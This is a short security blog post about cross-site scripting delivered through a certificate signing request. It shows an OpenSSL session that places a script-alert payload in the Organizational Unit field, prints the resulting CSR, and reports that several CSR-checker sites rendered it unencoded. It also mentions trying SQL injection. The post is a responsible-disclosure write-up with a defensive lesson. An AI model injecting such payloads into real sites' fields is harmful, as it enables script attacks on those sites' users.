Binaryfigments

XSS in a certificate signing request


Web application developers will all know, never to trust the input of the users of the web application. But what if you do not really know what they are submitting? While investigating some form fields in our application, I came across a form for checking a certificate signing request (CSR) witch you need to order a SSL / TLS certificate.

What is a CSR

A certificate signing request, CSR, is an encoded file with the information to request a certificate from a certificate authority (CA) or a reseller of that CA. You will need to create that file yourself and put in the information that you want. And that means that you can put everything in it what you want.

For example, something like this:

<script>alert('attacked')</script>

You also can try to do an SQL injection if the CA or the reseller is saving the information from the CSR to an SQL database for later use.

Examples

Here are some examples of websites who didn’t validate the data in the CSR. They just encoded the CSR and and put the data on the screen at it is.

Note: All the tested websites are informed about this.

This is the CSR I used in all the cases:

-----BEGIN CERTIFICATE REQUEST-----
MIICzjCCAbYCAQAwgYgxCzAJBgNVBAYTAk5MMRAwDgYDVQQIDAdVdHJlY2h0MRAw
DgYDVQQHDAdVdHJlY2h0MRIwEAYDVQQKDAlOdzRhbGwgQlYxKzApBgNVBAsMIjxz
Y3JpcHQ+YWxlcnQoJ2F0dGFja2VkJyk8L3NjcmlwdD4xFDASBgNVBAMMC3d3dy5v
Y3NyLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3UpBMvJ8Cc1N
FoTI083bzoXhVXaPxN4M/gqWZYSs7RCfkYyAwabLzw9zQeybUa1SXmvAcQjvfsYe
LJvZpHlY6XIbgaS8JXu5WCkYS6nTN5TDwzghNfCHRA65s47uEuVrXq6P5/Xm9ETp
v9yLTBzAL7sci/6oGq/7qKHfuypG08TRhj/GRraA67ZuDbw6u8uMB2YzTbkgxsDM
YUgamCLeLq39wLQNE4a+fWaxbp2XME30hRXONGI/yYDjavwNl6fXJ1A4fMktzzJd
bsQRVRAyEu04Aw48d8NAN1EDkUBBTneRRWMXWO9bfHSPLK+9E/6ntJu63P8I4llk
IR+hFU0uaQIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAA3QbR9+mxgR9socp21l
WWAQCA5D+JWs8yO3QfXZA4+3IAlqQtKEyz8j0Mncra7yI9QGasnTlnbOPIASb3WY
No/5GlWxzoMivSRHSBUHhg+gly1ZcpPsgKf37aYNFxOX40Fwr3rUSRPDiqx35eQ0
ECY/1GiPyOqH3t6ck41A1Y+d4WCHHI6g6QJp1ZGS98aDRxel4yaJRGqJf1NKMrqE
OScbogqLjD9XnrnTK1dUGUPKx0hpJ5EyYmSmweAxmE6AfffVw/+8QUbnMxyD0j8j
sUy/bACF0UCwBntRzZ17aZ8WHRq3zKeA3y3s/zU7JKS4ZJjP2rD3dGAIeSPN/nHv
9tI=
-----END CERTIFICATE REQUEST-----

You can check the contents of it here:

https://cryptoreport.websecurity.symantec.com/checker/views/csrCheck.jsp

How I made the CSR

Generatig the CSR was easy. It is like creating normal CSR’s but with some code in one field. I used OpenSSL on my Linux machine to generate the CSR. In the code block below you can see where I did put in the XSS. The line is highlighted.

[email protected]:~$ openssl req -utf8 -nodes -sha256 -newkey rsa:2048 -keyout private2.key -out cert2.csr
Generating a 2048 bit RSA private key
............................+++
.+++
writing new private key to 'private2.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:NL
State or Province Name (full name) [Some-State]:Utrecht
Locality Name (eg, city) []:Utrecht
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Nw4all BV
Organizational Unit Name (eg, section) []:<script>alert('attacked')</script>
Common Name (e.g. server FQDN or YOUR name) []:www.ocsr.nl
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

[email protected]:~$

Conclusion

What can we learn from this? Do not only check your input, also the results what will be displayed on the screen.

  • Update 2017-09-29: Most of them updated their website.
  • Update 2017-10-14: One certificate reseller didn’t understand the problem.